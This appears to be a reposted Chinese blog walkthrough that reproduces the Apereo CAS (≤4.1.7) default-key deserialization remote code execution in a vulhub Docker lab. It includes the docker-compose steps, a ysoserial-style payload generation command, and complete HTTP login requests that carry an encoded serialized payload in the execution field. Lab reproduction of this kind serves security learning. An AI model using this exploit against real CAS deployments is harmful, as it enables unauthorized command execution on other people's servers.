本文共 4423 字，大约阅读时间需要 14 分钟。

声明

好好学习，天天向上

漏洞描述

Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。

影响范围

Apereo CAS <= 4.1.7

复现过程

这里使用4.1.5版本

使用vulhub

cd /app/vulhub-master/apereo-cas/4.1-rce

使用docker启动

docker-compose builddocker-compose up -d

环境启动后，访问http://your-ip:8080/cas/login

http://192.168.239.129:8080/cas/login

下载exp（jar包）

https://github.com/vulhub/Apereo-CAS-Attack/releases

生成payload，等下要用

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/cas"

登录页面，用户名密码随意输入，点击login抓包，修改参数execution值为刚刚生成的payload

POST /cas/login HTTP/1.1Host: your-ipContent-Length: 2287Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://your-ip:8080Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://your-ip:8080/cas/loginAccept-Encoding: gzip, deflateAccept-Language: en,zh-CN;q=0.9,zh;q=0.8Cookie: JSESSIONID=24FB4BAAE1A66E8B76D521EE366B3E12; _ga=GA1.1.1139210877.1586367734Connection: closeusername=test&password=test<=LT-2-gs2epe7hUYofoq0gI21Cf6WZqMiJyj-cas01.example.org&execution=[payload]&_eventId=submit&submit=LOGIN

替换后如下

POST /cas/login HTTP/1.1Host: 192.168.239.129:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://192.168.239.129:8080/cas/loginCookie: JSESSIONID=F4956CA8A1E7772E5C4A819911D0B091; JSESSIONID=39AB6981AD8B98DBCF766423E57D075DDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 2293username=cas&password=cas<=LT-1-n6MvNgeb4HlUD6ayIONVkGS050511L-cas01.example.org&execution=57c38e7a-ab55-4f87-bc7e-94e2628c9b30_AAAAIgAAABDZDMj%2FCIcMdJgFOr7ya7OPAAAABmFlczEyODbCyXf3vF2T1tkbRxGGFFVajbHzO6qpHkGm6zU9ByVz81%2Bv2HJrjmj87TC9IHT2asf3Wxj0EXZffvDPQqPIyzRHN2MdsNbMK%2Fe24IapsQpAqhr4V63IyEI05LWBebXDHngNPeBYQarRIYhfWbSDS0ufmnK9EEfW5TdStZ7zoYwsfwE4oDjWPmf30ixGZbOQBIixy4T8O4m%2Bso8dElfo8N55%2F5Y9PtN4L5lBi5S3dY31mQ%2FzmGFM15ZWKeDVcjI4FYnvDs8zo%2FsHvyOR36OZlWRWFjywkZMLx9x2kKymYQIEgYw7yShXfDZAdb%2BKHXrbAdfwNIfkNbcjkwcCP%2BuLfwDqz2g2L7xLFq0mKSs5ZeBP2lc763u83%2BNQ4xFOUGhr2roBHuK2G%2BpxClfV7JjEZ%2BXbDJQTcbjIaLJOtn4rSStz%2Btx6aRGLGvb0bb9l8HgP5bKeWYj5Jdy8KlS67S1dx%2F9RCKkktDsyjibxYQRgU7ikPwrkXhDvPviXQIMYkcCCTqtjjq71RknYaMmKNk9Vt9HdiE%2BTFuFAEK%2FWZNkx%2BfxdGxYSEAQFqq8fG2cpf6QZSuhMFQ17AK4KGHwMkQqAEr2kftOMXdblV%2F49giIswHyBPJuCCmqeXKIJdpSG88NBxm8bpiZtlAEtB3IsKxen81SBiI1vgYqp8HaEZi13FdTfEYDtK8kQXi%2FqKOa%2F5cX8oET80p9WZ0zyU8yipNEeoVqY0KgyOGk0ym2gDobPMsZdbvph%2BGd75iM3v9%2BANAiXfkk0xVEvfni%2F4vAU1ZBTWEYt1%2BoVotboInrqZLhj4baSwppgWm%2Bp0k0GGzpigVyL%2FTuiBreB12xGMWGIlI7jCVEKbJDXeC2vB6tnLTZb27jnt7qMIxpbn0S9KxsRKm%2FhZWDiVKwpM9nRp4LuoC%2FfMgRUimS3LYoxCm6cv2%2BHDZB%2BP%2FyDDNWE6gu0bGyEYmkcO4e2SS20ugtAlji%2F2HvBwhsQJNhkxigkbgUlGW6f3O3G4aVYjk%2BXJ71bXJl45ITc2pHQ2aiAa3OCc3YDVaIkckhJ2NQce%2FGmiRdOdbML9j3SVOleJgCiPyZJwE6G%2Bl27oXCo5EuxHgIYolPTgvhs%2FYj8NLj66yZNnXKcK3PW3VYD9Trs3LglOs06xVFNyW4FdRtka8xoPxd5eMQ5XKZIz8QuBm%2FWVbCSrZq5O4WfUE5QhCjMkDnhWWfxRXzyJgyWTkemHktFVoGeMAkEv5G%2FMy7whdSWFHWwYo7wsn1X90TmKqDW0degsz1bbaoN2ui6pAECEic2%2BpZFZ1sjKvGfG1q8NNkFF8CwibZiM%2BKAo%2BZzktlMEd9RuvMkmaym5MOguUF2BpJlResHVZn2mm5%2FtpJ9A215xkqMsuaYrl36KWQpKVbZ6X7zpQbF5bqaVuDfHgry%2FXvPPwMOhTKjqFkSRiHOKwMu%2BqN%2BR0bgCJSFCUvTYaGIOJ%2BfFy82EHw4%2BkA1dI1VqFmufKSmUVEn9IcU%2BxKp0S3%2Fc7bBH8WdnVFrzOI9bFjQOmCJ1iYr1n3aXmNmX5pYWG8iFZap%2Fh4PyxOy%2Be1oXdT8jWiijB2KNO82Qf17ja6R0Qrm8euQCtKTSjmBr4z5nHkD6B3dtghpq3UBRgw6mVfoqOsy3KnC3Ihkmsd5cV9AfzWsDtNq00AaXWgSF77Kssd5WmfSAy8pJAMHIFYJWb2TkX%2FG%2FKnfHUfoO4vaXa%2FX9dKs%2B5OEeat%2FAKI2ldCw0agdPVyPZj5KcskJveNHD6Ysy2ms7P8CygPgF0zkdYfN08TPgrUZrXC6hj3DG4jGl6uJ%2B0DeSG00Z9QDJKhPz05mt9sGbL%2BbILaHLUkfCtt7RNqbP6pgYT1H9rMHMaFLCa7TqAUjn7w%2BBfruoZ2OTNPznxbo2C9MHq2aXfNa55GrAz5aiZ1KpafYbx4%2Bn7Fzoa93wXqDQOy9xTnTWTf95%2B%2FI50gZZLci5%2FkMtgDT&_eventId=submit&submit=LOGIN

关闭镜像（每次用完后关闭）

docker-compose down

docker-compose常用命令

拉镜像（进入到vulhub某个具体目录后）

docker-compose builddocker-compose up -d

镜像查询（查到的第一列就是ID值）

docker ps -a

进入指定镜像里面（根据上一条查出的ID进入）

docker exec -it ID /bin/bash

关闭镜像（每次用完后关闭）

docker-compose down

转载地址：https://blog.csdn.net/zy15667076526/article/details/111414240 如侵犯您的版权，请留言回复原文章的地址，我们会给您删除此文章，给您带来不便请您谅解！